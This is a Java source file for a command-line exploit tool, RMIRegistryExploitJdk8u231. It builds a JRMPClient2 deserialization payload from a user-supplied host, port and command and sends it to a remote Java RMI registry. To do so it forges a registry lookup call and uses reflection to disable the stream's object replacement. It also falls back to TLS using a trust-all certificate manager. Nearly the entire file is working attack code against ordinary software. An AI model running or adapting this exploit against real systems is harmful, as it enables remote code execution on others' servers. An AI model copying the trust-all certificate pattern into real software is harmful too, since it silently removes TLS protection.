package com.achuna33.Gadgets;
import com.achuna33.Gadgets.utils.ExecCheckingSecurityManager;
import com.achuna33.Gadgets.utils.Reflections;
import sun.rmi.transport.StreamRemoteCall;


import javax.net.ssl.SSLContext;
import javax.net.ssl.SSLSocketFactory;
import javax.net.ssl.TrustManager;
import javax.net.ssl.X509TrustManager;
import java.io.IOException;
import java.io.ObjectOutput;
import java.net.Socket;
import java.rmi.*;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import java.rmi.server.Operation;
import java.rmi.server.RMIClientSocketFactory;
import java.rmi.server.RemoteRef;
import java.security.cert.X509Certificate;
import java.util.concurrent.Callable;


/**
 * Command-line tool that sends a {@code JRMPClient2} payload object to a Java RMI registry.
 *
 * <p>Instead of going through the registry stub, it issues a hand-built registry call. In that
 * call, object replacement on the marshalling output stream is switched off before the payload
 * is written.
 *
 * <p>Usage: {@code RMIRegistryExploitJdk8u231 <host> <port> <command>}.
 *
 * <p>NOTE(review): the class name suggests JDK 8u231 registries are the target. The exact
 * affected JDK range is not established by this file.
 */
@SuppressWarnings({"rawtypes", "unchecked"})
public class RMIRegistryExploitJdk8u231 {

    /**
     * Operation descriptors for the {@link Registry} remote interface. The {@code opnum} passed to
     * {@link RemoteRef#newCall} indexes into this table: 0 = bind, 1 = list, 2 = lookup,
     * 3 = rebind, 4 = unbind.
     */
    private static final Operation[] REGISTRY_OPERATIONS = {
        new Operation("void bind(java.lang.String, java.rmi.Remote)"),
        new Operation("java.lang.String list()[]"),
        new Operation("java.rmi.Remote lookup(java.lang.String)"),
        new Operation("void rebind(java.lang.String, java.rmi.Remote)"),
        new Operation("void unbind(java.lang.String)")
    };

    /** Index of {@code bind} in {@link #REGISTRY_OPERATIONS}. */
    private static final int OP_BIND = 0;

    /** Index of {@code lookup} in {@link #REGISTRY_OPERATIONS}. */
    private static final int OP_LOOKUP = 2;

    /**
     * Interface hash sent with each registry call. It is taken from the JDK's generated registry
     * stub. NOTE(review): confirm it matches the target JDK.
     */
    private static final long REGISTRY_INTERFACE_HASH = 4905912898345647071L;

    /**
     * Trust manager that accepts every certificate chain without any validation.
     * It is only suitable for talking to test endpoints whose certificates are not trusted locally.
     */
    private static class TrustAllSSL implements X509TrustManager {
        private static final X509Certificate[] ANY_CA = {};

        @Override
        public X509Certificate[] getAcceptedIssuers() { return ANY_CA; }

        @Override
        public void checkServerTrusted(final X509Certificate[] c, final String t) { /* accept all */ }

        @Override
        public void checkClientTrusted(final X509Certificate[] c, final String t) { /* accept all */ }
    }

    /**
     * RMI client socket factory that opens TLS sockets and trusts any server certificate
     * (see {@link TrustAllSSL}).
     */
    private static class RMISSLClientSocketFactory implements RMIClientSocketFactory {
        /**
         * Opens a TLS socket to {@code host:port}.
         *
         * @throws IOException if the TLS context cannot be created or the connection fails;
         *     non-I/O failures are wrapped as the cause
         */
        @Override
        public Socket createSocket(String host, int port) throws IOException {
            try {
                SSLContext ctx = SSLContext.getInstance("TLS");
                ctx.init(null, new TrustManager[] {new TrustAllSSL()}, null);
                SSLSocketFactory factory = ctx.getSocketFactory();
                return factory.createSocket(host, port);
            } catch (Exception e) {
                throw new IOException(e);
            }
        }
    }

    /**
     * Entry point.
     *
     * <p>Steps:
     * <ol>
     *   <li>Connects to the registry and probes it with {@code list()}.</li>
     *   <li>If the probe fails with {@link ConnectIOException}, it reconnects over TLS.</li>
     *   <li>It then sends the payload via {@link #exploit}.</li>
     * </ol>
     *
     * @param args {@code <host> <port> <command>}
     * @throws Exception if the registry cannot be reached or the gadget class is missing
     */
    public static void main(final String[] args) throws Exception {
        if (args.length < 3) {
            System.err.println("Usage: " + RMIRegistryExploitJdk8u231.class.getName()
                    + " <host> <port> <command>");
            System.exit(-1);
            return;
        }
        final String host = args[0];
        final int port = Integer.parseInt(args[1]);
        final String gadget = "JRMPClient2";
        final String command = args[2];

        Registry registry = LocateRegistry.getRegistry(host, port);
        final String className = RMIRegistryExploitJdk8u231.class.getPackage().getName() + "." + gadget;
        System.out.println(className);
        // Fails fast with ClassNotFoundException if the gadget class is not on the classpath.
        final Class<?> payloadClass = Class.forName(className);

        // Probe the registry over plain TCP; on a connection-level failure, retry over TLS.
        try {
            registry.list();
        } catch (ConnectIOException ex) {
            registry = LocateRegistry.getRegistry(host, port, new RMISSLClientSocketFactory());
        }

        exploit(registry, payloadClass, command);
        // Without an explicit exit the JVM was observed not to terminate on its own.
        // NOTE(review): presumably non-daemon RMI/TLS threads stay alive — confirm.
        System.exit(0);
    }

    /**
     * Builds a {@code JRMPClient2} payload for {@code command} and sends it to the registry.
     * The send uses {@link #lookup(Registry, Remote)}. Everything runs inside
     * {@code ExecCheckingSecurityManager.callWrapped}; the original comment says this is so the
     * payload does not detonate locally during construction.
     *
     * <p>Any {@link Throwable} raised by the remote call is printed and swallowed. This is
     * deliberate: the target is expected to answer with an error.
     *
     * @param registry target registry
     * @param payloadClass currently unused; the payload is always built with {@code JRMPClient2}.
     *     Kept for signature compatibility.
     * @param command argument passed to {@code JRMPClient2.getObject}
     * @throws Exception if payload construction fails
     */
    public static void exploit(final Registry registry,
                               final Class<?> payloadClass,
                               final String command) throws Exception {
        new ExecCheckingSecurityManager().callWrapped(new Callable<Void>() {
            @Override
            public Void call() throws Exception {
                Object payload = new JRMPClient2().getObject(command);
                // Use the JRMPClient2 object directly rather than wrapping it in a map proxy.
                Remote remote = (Remote) payload;
                try {
                    // bind() is still subject to the registry's remote-IP restriction,
                    // so lookup() is used instead.
                    lookup(registry, remote);
                } catch (Throwable e) {
                    e.printStackTrace();
                }
                return null;
            }
        });
    }

    /**
     * Hand-built equivalent of {@code Registry.bind(var1, var2)}.
     *
     * <p>It writes the arguments itself after setting the output stream's private
     * {@code enableReplace} field to {@code false}. That disables {@code replaceObject} on the
     * stream, so {@code var2} is serialized as-is.
     *
     * <p>NOTE: per the original author this path is still rejected for non-local callers.
     *
     * @param registry registry whose {@code ref} field supplies the transport
     * @param var1 name to bind
     * @param var2 object to serialize as the bound value
     * @throws AccessException if the registry denies the operation
     * @throws AlreadyBoundException if the registry reports the name is taken
     * @throws RemoteException on transport or marshalling failure
     */
    public static void bind(Registry registry, String var1, Remote var2)
            throws AccessException, AlreadyBoundException, RemoteException {
        try {
            RemoteRef ref = (RemoteRef) Reflections.getFieldValue(registry, "ref");
            StreamRemoteCall call = (StreamRemoteCall) ref.newCall(
                    (java.rmi.server.RemoteObject) registry, REGISTRY_OPERATIONS, OP_BIND, REGISTRY_INTERFACE_HASH);

            try {
                ObjectOutput out = call.getOutputStream();
                Reflections.setFieldValue(out, "enableReplace", false);
                out.writeObject(var1);
                out.writeObject(var2);
            } catch (IOException e) {
                throw new MarshalException("error marshalling arguments", e);
            }

            ref.invoke(call);
            ref.done(call);
        } catch (RuntimeException | RemoteException | AlreadyBoundException e) {
            throw e;
        } catch (Exception e) {
            throw new UnexpectedException("undeclared checked exception", e);
        }
    }

    /**
     * Hand-built registry {@code lookup} call whose single argument is {@code var1}.
     *
     * <p>Normally that argument is a String name. It is written after the output stream's private
     * {@code enableReplace} field is set to {@code false}. The reply is not read.
     *
     * @param registry registry whose {@code ref} field supplies the transport
     * @param var1 object written as the lookup argument
     * @throws AccessException if the registry denies the operation
     * @throws AlreadyBoundException declared for signature compatibility with {@link #bind}
     * @throws RemoteException on transport or marshalling failure
     */
    public static void lookup(Registry registry, Remote var1)
            throws AccessException, AlreadyBoundException, RemoteException {
        try {
            RemoteRef ref = (RemoteRef) Reflections.getFieldValue(registry, "ref");
            StreamRemoteCall call = (StreamRemoteCall) ref.newCall(
                    (java.rmi.server.RemoteObject) registry, REGISTRY_OPERATIONS, OP_LOOKUP, REGISTRY_INTERFACE_HASH);

            try {
                ObjectOutput out = call.getOutputStream();
                Reflections.setFieldValue(out, "enableReplace", false);
                out.writeObject(var1);
            } catch (IOException e) {
                throw new MarshalException("error marshalling arguments", e);
            }

            ref.invoke(call);
            ref.done(call);
        } catch (RuntimeException | RemoteException | AlreadyBoundException e) {
            throw e;
        } catch (Exception e) {
            throw new UnexpectedException("undeclared checked exception", e);
        }
    }
}
